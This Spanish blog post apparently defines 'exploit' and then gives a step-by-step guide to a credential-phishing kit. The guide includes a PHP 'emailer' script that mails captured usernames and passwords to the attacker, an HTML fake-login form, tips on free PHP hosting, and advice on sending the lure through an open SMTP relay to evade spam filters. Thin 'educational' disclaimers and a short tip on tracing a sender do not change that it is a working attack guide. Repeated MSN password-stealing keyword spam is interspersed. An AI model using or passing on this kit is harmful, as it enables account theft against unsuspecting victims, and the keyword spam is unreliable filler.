Exploit


Exploit (del inglés to exploit, explotar, aprovechar) es el nombre con el que se identifica un programa informático malicioso, o parte del programa, que trata de forzar alguna deficiencia o vulnerabilidad de otro programa.

El fin puede ser la destrucción o inhabilitación del sistema atacado, aunque normalmente se trata de violar las medidas de seguridad para poder acceder al mismo de forma no autorizada y emplearlo en beneficio propio o como origen de otros ataques a terceros.

Los xploits se pueden caracterizar según las categorías de vulnerabilidades utilizadas:

Vulnerabilidades de desbordamiento de buffer
Vulnerabilidades de condición de carrera
Vulnerabilidades de error de formato de cadena
Vulnerabilidades de Cross Site Scripting XSS
Vulnerabilidades de Inyección SQL
Vulnerabilidades de Inyección de Caracteres CRLF
Vulnerabilidades de denegación del servicio
Vulnerabilidades Inyección múltiple HTML Multiple HTML Injection
Vulnerabilidades de ventanas engañosas o mistificación de ventanas Window Spoofing

  •  COMO HACER UN XPLOIT ILEGAL PROPIO
    • Saber que es un xploit
    • Conocer de HTML (php no es necesario)
    • Saber enviar un correo un correo anónimo.
    • Tener un espacio web ó hosting donde se puedan subir y que funcionen archivos PHP

msn 8 ratero para live script xploit messenger hacking a cuenta de correo। nellofetek exploit mail + xploit como usar el Ratero msn8. COMO RECUPERAR CONTRASEÑAS DE CORREO HACKEADO programa ratero MSN FALSO LADRON O ROBAR CONTRASEÑAS xploits 2009. programa para hackear cuentas de msn xploit. hacker español contraseña msn programas para crear xploits. recuperar mi contraseña de msn robada codigos de xploit hack. hack msn 2009 megaupload

¿Qué conocimiento deberia aprender después de leerla?
Pues esta guia es para que crees tu propio xploit y llegue la contraseña de cualquier cosa a tu correo
electrónico, de manera que puedas personalizar lo mas posible el xploit, la
victima caiga, y el pass llegue a tu correo, y asi no dependas de otra persona o servidor
para hacerlo. E incluso para en caso de que te envien uno, para aprender quien te lo envió.

EMPECEMOS:
Bueno esta guia consiste en la elaboración de un xploit con FINES EDUCATIVOS y en caso
de que recibas una, de como conocoer el atacante. no explicare que es un xploit y
que diseño utilizar, pues deben arreglarsela ustedes mismos. Primero abran
el “Block de Notas” de windows y escriban el siguiente código dentro de él para crear el
emailer:

<?php $mi_correo = “micorreo@gmail.com”; $redir = “http://www.hotmail.com/&#8221;;if ($_SERVER[‘REQUEST_METHOD’] != “POST”){exit;}

while(list($key,$value) = each($_POST)){if(!(empty($value))){$set=1;}$mensaje
= $mensaje . “$key: $value\n\n”;} if($set!==1){header(“location:
$_SERVER[HTTP_REFERER]”);exit;} //copied
from skatox.co.ve $headers = “From: ” .
$Email . “\n” . “Return-Path: ” . $Email .
“\n” . “Reply-To: ” . $Email . “\n”; mail($mi_correo,$subject,$mensaje,$headers);
?>

Primero en elcampo de “$mi_correol =” coloquen elcorreo al que deseen que llegue lainformación.

Luego en el campo de “$redir =” coloquen la URL de donde va a ser redirigido una vez
enviada la información el password.

Al final de todo este código pueden colocar todo el HTML de la página que mencioné en el segundo
párrafo asi no tienen que almacenarla en otro lado sino que en el mismo emailer se mete dicha web.

Luego guarden todo el archivo mediante el “Bloc de Notas” como emailer.php

msn 8 ratero para live script xploit messenger hacking a cuenta de correo। nellofetek exploit mail + xploit como usar el Ratero msn8. COMO RECUPERAR CONTRASEÑAS DE CORREO HACKEADO programa ratero MSN FALSO LADRON O ROBAR CONTRASEÑAS xploits 2009. programa para hackear cuentas de msn xploit. hacker español contraseña msn programas para crear xploits. recuperar mi contraseña de msn robada codigos de xploit hack. hack msn 2009 megaupload

Una vez guardado el emailer.php, busquen un host que permita el uso de php (Si es
q no lo tienen), pueden usar algún espacio de miarroba.com, lycos.com,
gratishost.com, etc. En google aparecen muchos. Y suban el archivo a un servidor
de estos, y copien la direccion del ARCHIVO no de la página o de su cuenta,
sino la locación exacta del archivo “emailer.php” por ejemplo, en lycos sería algo asi. 
http://usuarios.lycos.es/TUCUENTA/emailer.php

EL ENVIO DE XPLOITS ES ILEGAL, PUEDES
METERTE EN PROBLEMAS O SUSPENSION DE CUENTA
, HAZLO BAJO TU PROPIO RIESGO Y
RESPONSABILIDAD. Luego viene la parte de hacer el formulario que será
enviado. Aquí solo les voy a explicar la parte del formulario del xploit, luego uds
se las arreglan para adornarlo y mejorarlo con cualquier editor de páginas web, solo
recuerden cambiar la frase “DIRECCION DEL LUGAR DONDE ESTA ALMACENADO EL EMAILER”
por la URL de tu emailer:

Nombre de la cuenta: Contraseña: Cometarios (opcional)

Código

Html (va dentro del body):

<form action=”DIRECCION DEL LUGAR DONDE ESTA ALMACENADO EL EMAILER” method=”post”>

<p>nombre <input type=”text” size=”30″ name=”subject”></p>

<p>contraseña <input type=”text” size=”30″ name=”mensaje”></p>

<p>comentarios<textarea name=”Comments” rows=”6″ cols=”30″><p><input value=”Enviar” name=”enviar” type=”submit”></textarea></p></form>

Muy bien, ahora viene la parte final, una vez subido el “emailer.php” al
servidor, y haber hecho el formulario del xploit viene la parte del envio,
para eso necesitaran un programa para emails formato HTML, de modo que se
pueda ver como una página el correo recibido.
Para evitar que el correo sea leído como Spam o Correo no deseado
(suele pasar si la victima tiene un filtro de correo), utilicen como
servidor SMTP el mismo de la cuenta del correo o de la página, por ejemplo una
vez mande un xploit para fines personales de la página (www.ejemplo.com)
y al hacerle un scan en el puerto 25 (Sendmail) lo tenia abierto y pude enviar
fácilmente la direccion admin@ejemplo.com para que no me
la detectara como correo basura.msn 8 ratero para live script xploit messenger hacking a cuenta de correo। nellofetek exploit mail + xploit como usar el Ratero msn8. COMO RECUPERAR CONTRASEÑAS DE CORREO HACKEADO programa ratero MSN FALSO LADRON O ROBAR CONTRASEÑAS xploits 2009. programa para hackear cuentas de msn xploit. hacker español contraseña msn programas para crear xploits. recuperar mi contraseña de msn robada codigos de xploit hack. hack msn 2009 megauploadBueno en el titulo del correo (Subject) coloquen lo que deseen
y en el mensaje del correo deben colocar TODO EL CODIGO HTML DEL EXPLOIT, desde
la etiqueta <html> hasta la etiqueta </html>. Esto hará que se vea como una pagina web
y no como simple texto.

SOLO LAMMERS USAN XPLOITS PARA EL CORREO

Estos son todos los conocimientos Básicos para realizar un
xploit, para mejorar en esta área, les recomiendo que busquen mas información
en google, miren otros xploits a ver como funcionan, prueben con uds mismos,
primero para ver como se ve el xploit, y segundo, para ver si funciona el emailer.

Espero que les haya gustado la guia, cualquier comentario, sugerencia, (NADA DE AYUDA)
contactenme Por cierto, si les llega un correo de estos, miren el código fuente
del xploit, luego chequeen cual es la URL del email, y abran este con “Bloc de
Notas” y miren el campo $my_email para tener el correo de quien los quiere
joder a uds. Y hagan algo con esa direccion jejejejee.Otra cosa es chequear los headers del correo, asi podrán investigar la IP desde donde fue
enviado, para hacer eso, busquen en Google como obtener la dirección IP de un correo.SKATOX.<script language=”JavaScript”>

<!–

var scrollCounter = 0;
var scrollText = “..:: Bienvenidos a la
página de sharck ::..”;
var scrollDelay = 70;

var i = 0;
while (i ++ < 140)

scrollText = ” ” + scrollText;

function Scroller()

{window.status =
scrollText.substring(scrollCounter++,

scrollText.length);

if (scrollCounter == scrollText.length)

scrollCounter = 0;

setTimeout(“Scroller()”, scrollDelay);

}

Scroller();

//–>

</script>

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión /  Cambiar )

Google photo

Estás comentando usando tu cuenta de Google. Cerrar sesión /  Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión /  Cambiar )

Conectando a %s